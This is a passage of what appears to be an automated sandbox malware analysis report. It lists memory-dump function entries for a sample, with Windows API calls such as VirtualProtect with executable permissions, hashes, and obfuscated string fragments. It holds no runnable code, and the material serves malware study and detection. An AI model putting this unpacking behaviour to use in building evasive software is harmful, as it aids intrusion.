                                                                          • Opcode Fuzzy Hash: c14029486e0011a938abf89c52cd395a291440da30a797f13b8f33d676c3cde2
                                                                          • Instruction Fuzzy Hash: 2D9104B1D046689FEB249B28CC447FA7775FB81315F1841FEE44EAA680E7394EC1CA52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 06231b7213b3b135dca516c4c8bd7012eda4f7a7a19e6028b2ed182a3c56d3a4
                                                                          • Instruction ID: 28822de1b45158cc7925f5d303a1e0186972ffbad05eb0a83b8f9df679bad30f
                                                                          • Opcode Fuzzy Hash: 06231b7213b3b135dca516c4c8bd7012eda4f7a7a19e6028b2ed182a3c56d3a4
                                                                          • Instruction Fuzzy Hash: B0913570E046298FDB29CF14CD94BAABBB5FB85306F1481EAD949A7341CA346EC5CF50
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 45c5331e40ff8744fa664ca27ae6b165c0e5d42430d740282b95b60e7d183e4d
                                                                          • Instruction ID: 0ee1d56bb1ccbccfec81fc236bea30620057f532d27a975df2ff496db117ad02
                                                                          • Opcode Fuzzy Hash: 45c5331e40ff8744fa664ca27ae6b165c0e5d42430d740282b95b60e7d183e4d
                                                                          • Instruction Fuzzy Hash: 5E6102B2C085299BEB248B24DC48BFBB775FF54304F1581FAD80DA6640E6785BC58B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: c8eaa0244a04639ff839bf771c3cb5706333ff9b7b4d6fb3ffd42478c667f14f
                                                                          • Instruction ID: 5eb406d8fa2b0ba876403ad4381f42626fd28fdcc7391680f0314d77f651548e
                                                                          • Opcode Fuzzy Hash: c8eaa0244a04639ff839bf771c3cb5706333ff9b7b4d6fb3ffd42478c667f14f
                                                                          • Instruction Fuzzy Hash: D161E0B1D012688FEB24CF25DD44BEAB779EF40306F1081FAD80DA2644E6785FC18E66
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee0cc81e03a3e3e0f96ff0cd04e9a4a7777ebb4f99ebf07cf61579f04f003137
                                                                          • Instruction ID: 1f67d60c764271bf4744f646f58de9bcfda1976ccbbceb3ae1e0d8f1e26cfc5c
                                                                          • Opcode Fuzzy Hash: ee0cc81e03a3e3e0f96ff0cd04e9a4a7777ebb4f99ebf07cf61579f04f003137
                                                                          • Instruction Fuzzy Hash: 565136A2D082588EFB208F25DC54BFA7775EF84305F0480EED94D56686D2385FC68F22
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: d786799451f91f3f7f04210a9f3808064f8e009dac04228b433b63af472d3558
                                                                          • Instruction ID: fc48f622e8599c73779df4180ee26e68894e572ea58237ea9ef6fa9c0e80eb5d
                                                                          • Opcode Fuzzy Hash: d786799451f91f3f7f04210a9f3808064f8e009dac04228b433b63af472d3558
                                                                          • Instruction Fuzzy Hash: 7741B5B0D051388AEB248F26DC447FA77B9EF40306F1041EBE80996281E7785FD5CE26
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: ed924e8c82da8f69bd5bcce666b65986589a22a6642a840aa131b83f59e40771
                                                                          • Instruction ID: 0a5f6e6e6187889b3626142e83c04c9d85a1186e3f95da11b832c85c5a6e9884
                                                                          • Opcode Fuzzy Hash: ed924e8c82da8f69bd5bcce666b65986589a22a6642a840aa131b83f59e40771
                                                                          • Instruction Fuzzy Hash: 9A3138B1D086985EE7109F21CC98BE67B78EB80315F1481FFDA4946683C67C5A96CB32
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 40450e4d924050cdd36fde371bc6780303a71c7d97ca836985cec4665ebad97f
                                                                          • Instruction ID: dc4b9013adcf750a3b8d0dd09aff0b25a8ba7e4083fafee89901e8b968d5d8d3
                                                                          • Opcode Fuzzy Hash: 40450e4d924050cdd36fde371bc6780303a71c7d97ca836985cec4665ebad97f
                                                                          • Instruction Fuzzy Hash: 7A41C2B0E051A98BDB60CF15CC90BEE7BB6AF85316F1441EAD44DA2241DA389FD1CF15
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: 590c3ef7c4644c99029b26e3cb6be1e5c44186ac5e306239386144ee560dc9b2
                                                                          • Instruction ID: db6bf5324dd7701177a7cd20aae782a12687dafae1fad906da7776ffbb255326
                                                                          • Opcode Fuzzy Hash: 590c3ef7c4644c99029b26e3cb6be1e5c44186ac5e306239386144ee560dc9b2
                                                                          • Instruction Fuzzy Hash: 5BB1D1B1D042699BE7248B24DC547FABBB5FF41314F0480FAD44DA6285E3B89EC58B52
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 004B35D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 3564de2d3e902b148a49503b35dadf16ef2981d3308f578664ded007ca62db7e
                                                                          • Instruction ID: 0f9cd986809366abed5b298a8416a68edf8b367baff8de3b811da0e0ce9dadac
                                                                          • Opcode Fuzzy Hash: 3564de2d3e902b148a49503b35dadf16ef2981d3308f578664ded007ca62db7e
                                                                          • Instruction Fuzzy Hash: 90116DB4D052698ADB308F66CC947EDB7B0AB14316F0002DAD80DA6281E7745FC1CF16
                                                                          APIs
                                                                          • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004B4B99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultLocaleQuery
                                                                          • String ID:
                                                                          • API String ID: 2949231068-0
                                                                          • Opcode ID: 8c448b88e4e0074408337ed0f10e9d8ebc4b9d479747f19cf9a9ab7738c1382c
                                                                          • Instruction ID: 1bb83d90325f157b311f415aa0709ef8a6b19382b13e5ffa28c52fdd41266865
                                                                          • Opcode Fuzzy Hash: 8c448b88e4e0074408337ed0f10e9d8ebc4b9d479747f19cf9a9ab7738c1382c
                                                                          • Instruction Fuzzy Hash: C9E0CDB1D0828045F38096519C597E7366CDBD4311F1440EAD50D80183D7BCE6C58E33
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: d077e53401879d93ba946f0e1236ce3b923a8090875df624acab45441a3b8624
                                                                          • Instruction ID: f20a492f40d80bdd83f01b93d5655528874b32db089909c1cdfd444501b91691
                                                                          • Opcode Fuzzy Hash: d077e53401879d93ba946f0e1236ce3b923a8090875df624acab45441a3b8624
                                                                          • Instruction Fuzzy Hash: 229105B2D082699BE7248A24DC54BEBBB75FF50304F0480F9D40DA6285E7B89FC58F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
                                                                          • Opcode ID: fe3e3677abffc6e8712896bd437d0043d98a756485b88a3423a7b79e6f27c35e
                                                                          • Instruction ID: a7ecd6e3c9ade940388f36e590485fe5a8ef24541893aca897776f4d4eceb4b3
                                                                          • Opcode Fuzzy Hash: fe3e3677abffc6e8712896bd437d0043d98a756485b88a3423a7b79e6f27c35e
                                                                          • Instruction Fuzzy Hash: F49158B2D081989BE7248624DC84BEB7BBAFF41304F1880FAD44DA6245D7799FC48F52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: _R
                                                                          • API String ID: 0-4285093506
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: 7F65$L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 544645111-214950705
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 544645111-4069139063
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: KAL3$L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-1595411076
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-4069139063
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-4069139063
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-4069139063
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-4069139063
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
Similarity
• API ID: FreeVirtual
• String ID: L$L$W$a$a$b$d$i$o$r$r$y
• API String ID: 1263568516-4069139063
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID: GKG8$IF;8
• API String ID: 0-4084355659
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
Similarity
• API ID: SuspendThreadWow64
• String ID: 9MM;
• API String ID: 1286204186-553234120
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: XP
• API String ID: 544645111-2561422682
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: N9LF
• API String ID: 544645111-2990983841
APIs
• VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
Strings
Memory Dump Source
• Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: :;YS
• API String ID: 544645111-267856891
                                                                          • Opcode ID: 3e20d81e49f4e1fb833db3f70bf56daf993c39c59452267590ec047143f5dbae
                                                                          • Instruction ID: 8b8c47efdc90421203a57270e7db0916d0ca28568d03e1c8cca3d58c26788955
                                                                          • Opcode Fuzzy Hash: 3e20d81e49f4e1fb833db3f70bf56daf993c39c59452267590ec047143f5dbae
                                                                          • Instruction Fuzzy Hash: CBF0E9B2A0526E4FD7209B54CCC4AF57B7AFF41348F5401EDE509D6141D2754989CB16
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-399585960
                                                                          • Opcode ID: e83f84cffd3e9fb4417bb22d6bad182a8c2840245aba02a94f1800a50c60a452
                                                                          • Instruction ID: 507a7cccd01b62f1fd72c920b159ea1c1f2cc0d797c5161bb25ddb0837b87c78
                                                                          • Opcode Fuzzy Hash: e83f84cffd3e9fb4417bb22d6bad182a8c2840245aba02a94f1800a50c60a452
                                                                          • Instruction Fuzzy Hash: ABE0EDB5A0921DCBDB34CA55DC907F8B371EB94325F1042EBD51D91680C6340E859F56
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 51114aa891832aa18758f0fbf0199872fb32171fb5fc94f632483984e3dbf3d9
                                                                          • Instruction ID: a145c7ee21331861cf4670adda9b884081cc63bc7a3b21086c1c2183cf9356e5
                                                                          • Opcode Fuzzy Hash: 51114aa891832aa18758f0fbf0199872fb32171fb5fc94f632483984e3dbf3d9
                                                                          • Instruction Fuzzy Hash: 3B2195B2A15518AFE714CA24DC94AFFB37DEBD5310F1081AAA50EA6680C67CAFC14F15
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 4NC9
                                                                          • API String ID: 1263568516-2690155758
                                                                          • Opcode ID: 271f2f0359f654d7be010c519dda69adc405196c6e280aa2abce32fc39a936df
                                                                          • Instruction ID: 121c744e13d5529f3eb2c2c978807ac318fdc16c2bb6e1f2ca70bad0e33a9a04
                                                                          • Opcode Fuzzy Hash: 271f2f0359f654d7be010c519dda69adc405196c6e280aa2abce32fc39a936df
                                                                          • Instruction Fuzzy Hash: 2E21F3B2E01258ABF7708A64DC48FAB7B79FBC5720F1440B9E40DA6280C6789FC18F51
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: NOCH
                                                                          • API String ID: 1263568516-2182803339
                                                                          • Opcode ID: febecf4c4c1df91a58e62c5a5eef959462ca7b8ba408fc8ff683c91704266c8b
                                                                          • Instruction ID: 4d0cde98bde520bf017230c283b284776dc1e6b7bf8dd9b8a2ee6e989fc4cb78
                                                                          • Opcode Fuzzy Hash: febecf4c4c1df91a58e62c5a5eef959462ca7b8ba408fc8ff683c91704266c8b
                                                                          • Instruction Fuzzy Hash: E121F1A2E01658ABFB608A60DC48FAA7779FBC4724F1440F9A40DEA180C67C9AC08F11
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c09862034ab12f13a5adf03a6caafb108f8ba06e7d4cde7771df2d10c887d56
                                                                          • Instruction ID: 9cc3e31eb206b7518337fae29dbb3d51ad87b83d972195753a72c84fa1da5fe4
                                                                          • Opcode Fuzzy Hash: 4c09862034ab12f13a5adf03a6caafb108f8ba06e7d4cde7771df2d10c887d56
                                                                          • Instruction Fuzzy Hash: 6BD1B0B1D051688FEB24CF14DC98BEABBB5FB84318F1542EAD90DA6240D6356EC4CF81
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 107eaea3b6d86088b0963b4fadc1be8ebbb43da93d9d449c03a01ecca49a8707
                                                                          • Instruction ID: 0c98abf47840c33b94ae3edf9fbefce315bdd3851586fe1b7886e0be4115d44f
                                                                          • Opcode Fuzzy Hash: 107eaea3b6d86088b0963b4fadc1be8ebbb43da93d9d449c03a01ecca49a8707
                                                                          • Instruction Fuzzy Hash: 8C91E8B2D04528DEEB288B14DC84BFA7375FB85315F1881FED80EA6640E6395EC58F52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 32c0743b1f9c5217da9b3244edb9b5e072506e848c4b3e54283ca89a375ed033
                                                                          • Instruction ID: 9d8d38d26e9920ebefd080597bfc467797b4a089e0f2b8ced313cfbe6745a529
                                                                          • Opcode Fuzzy Hash: 32c0743b1f9c5217da9b3244edb9b5e072506e848c4b3e54283ca89a375ed033
                                                                          • Instruction Fuzzy Hash: 79A127B5D091698BDB24CB14CC90BEEB7B5EBD6305F2481EAD80D67241D6786F81CF88
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e44bf88733ed08a9ad68586f3d4023771a16757fa5231110b9b3d03d30849834
                                                                          • Instruction ID: c93ba355f7504ea388010b394bb0c598c7c6220cc3d38592b4e74115d6cb7500
                                                                          • Opcode Fuzzy Hash: e44bf88733ed08a9ad68586f3d4023771a16757fa5231110b9b3d03d30849834
                                                                          • Instruction Fuzzy Hash: 0B7105B2D04518DEEB288B14DC84BFAB775FB81315F1841FED90EA6280E6795EC18F52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 12444fd4a75696895cb4690c9b66fad066d9ed382cb2a83f318f332ca05a54c6
                                                                          • Instruction ID: cbcefe35e4f0ac372aca01d96b28bfb0c382e16b161b6cf47399bfae0178f548
                                                                          • Opcode Fuzzy Hash: 12444fd4a75696895cb4690c9b66fad066d9ed382cb2a83f318f332ca05a54c6
                                                                          • Instruction Fuzzy Hash: 7561C3F2D042289BEB288B14DC55AEB7774FF55314F1542FAEA0DA6240EA785FC08F52
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
